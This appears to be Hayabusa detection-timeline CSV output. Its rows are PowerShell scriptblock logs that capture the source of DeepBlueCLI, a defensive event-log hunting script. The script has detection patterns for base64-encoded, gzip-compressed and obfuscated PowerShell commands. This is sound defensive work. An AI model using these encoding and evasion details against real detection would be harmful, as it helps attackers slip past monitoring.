no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:56:34.470 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:56:34.470 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:56:34.470 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:56:34.474 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:56:34.482 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:56:34.485 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:58:22.516 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:58:22.516 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:58:22.517 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:58:22.518 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:58:28.692 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:59:30.619 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:59:31.969 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:59:31.974 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue <at> backshore <dot> net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content 